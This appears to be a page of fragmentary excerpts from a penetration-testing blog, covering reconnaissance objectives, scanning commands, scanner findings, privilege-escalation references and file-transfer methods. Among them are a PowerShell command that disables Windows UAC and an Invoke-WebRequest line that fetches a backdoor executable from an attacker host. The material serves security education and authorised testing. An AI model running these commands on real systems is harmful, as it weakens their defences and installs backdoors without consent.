Search in exploit-db: searchsploit --color samba | grep 'linux\/' | grep -v '/dos/'
After gaining a foothold on the target (exploitation), we want to upload and download files.
Tools: nmap OS detection, xprobe2
Objective: On UDP port 1434 the MS SQL Browser Service is most likely listening. You can query this service to retrieve version info and the TCP port on which the MS SQL Server service is listening. Nmap: nmap -P0 -v -sU -sV -p 1434 <ip> --script ms-sql-info
References: Nmap UDP Protocol Scanner
References: Basic Linux Privilege Escalation (https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/); Windows Privilege Escalation (http://www.fuzzysecurity.com/tutorials/16.html, http://www.bhafsec.com/wiki/index.php/Windows_Privilege_Escalation, https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/, https://github.com/ankh2054/windows-pentest, https://github.com/SecWiki/windows-kernel-exploits, https://github.com/abatchy17/WindowsExploits)
References: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
Objective: Check your web server SSL/TLS configuration via online tools.
Often, during a penetration test on web applications, we come up against many error codes generated by applications or web servers. It is possible to cause these errors to be displayed by using particular requests, either specially crafted with tools or created manually. These codes are very useful to penetration testers during their activities, because […]
Nikto output: DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
Nikto output: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type.
Nessus output: Synopsis: The remote device supports LLMNR. Description: The remote device answered to a Link-local Multicast Name Resolution (LLMNR) request. This protocol provides a name lookup service similar to NetBIOS or DNS. It is enabled by default on modern Windows versions. Reported risk factor by Nessus: None. In my opinion the severity should […]
Description: Code injection technique published by enSilo. AtomBombing: Brand New Code Injection for Windows
Objective: Verify the HTTP response headers of your web site/apps.
You will probably find this issue during the manual browsing and spidering phase of your assessment, but Netsparker will also report it during the scanning phase.
You will probably find this issue during the manual browsing and spidering phase of your assessment, but Nessus will also report it during the scanning phase.
Links: Metasploit Unleashed Free Online Security Training, Metasploit Minute, Metasploit Megaprimer, Metasploit Cheat Sheet, Metasploit on GitHub
Nessus output: Description: The version of Windows running on the remote host is affected by a vulnerability in the HTTP protocol stack (HTTP.sys) due to improperly parsing crafted HTTP requests. A remote attacker can exploit this to execute arbitrary code with System privileges.
What is vFeed: Cross Linked and Aggregated Local Vulnerability Database. https://github.com/toolswatch/vFeed, http://www.vfeed.io/
There are many pentest methodologies that all share the same basic approach, but their phases are named differently: Pre-engagement steps / Preparation / Scoping; Intelligence Gathering / Information Gathering / Reconnaissance (Recon) / Open source intelligence (OSINT) / Footprinting; Threat Modeling; Scanning / Mapping / Enumeration / Vulnerability Analysis / Discovery; Exploitation; Post-Exploitation / Maintaining Access / […]
Test objective: Perform name lookups with a wordlist (dictionary attack) to identify services/hosts/websites in the target domain. Only applicable if the "Check for DNS zone transfer" test failed.
Test objective: Obtain valid server names and aliases for the IP addresses in the defined scope of the test. Only applicable if the "Check for DNS zone transfer" test failed.
Test objective: Test if the authoritative nameservers allow zone transfers for the domains in scope.
Test objective: To understand what sensitive design and configuration information of the application/system/organization is exposed, both directly (on the organization's website) and indirectly (on a third-party website). (From the OWASP Testing Guide v4.0, Conduct search engine discovery/reconnaissance for information leakage, OTG-INFO-001)
Test objective: Find the version and type of a running web server to determine known vulnerabilities and the appropriate exploits to use during testing. (OWASP Testing Guide v4.0, OTG-INFO-002)
Test objective: Find the version and type of a running web server to determine known vulnerabilities and the appropriate exploits to use during testing. (OWASP Testing Guide v4.0, Fingerprint Web Server, OTG-INFO-002)
Test Objective: Locate and record the target website(s).
Test objective: Check if the DNS servers answer version queries. Analyze the reported version for vulnerabilities and available exploits.
Objective: List the authoritative name server for the target domain(s).
Objectives: determine the IP range of the target(s); determine the nameservers of the target(s); determine the AS number of the target(s); determine the registrar of the target (provider); determine the address information of the registrar; identify administrative contacts; collect telephone numbers; gather email addresses.
PowerShell: New-ItemProperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\policies\system -Name EnableLUA -PropertyType DWord -Value 0 -Force (reboot required!) Links: What pentesters should know about UAC; Bypass UAC on Windows 8.1
Bash: sort -n -t . -k 1,1 -k 2,2 -k 3,3 -k 4,4 PowerShell: gc .\ips.txt | sort {"{0:d3}.{1:d3}.{2:d3}.{3:d3}" -f @([int[]]$_.split('.')) } Excel: Use the following formula to calculate a number which we can sort on (cell […]
Objective: Methods to download files via the Windows command line.
When we try to download a backdoor program, Windows Defender will block the file. Invoke-WebRequest -uri "http://192.168.1.17/sbd.exe" -OutFile ".\sbd.exe"
A few code snippets to perform ping sweeps: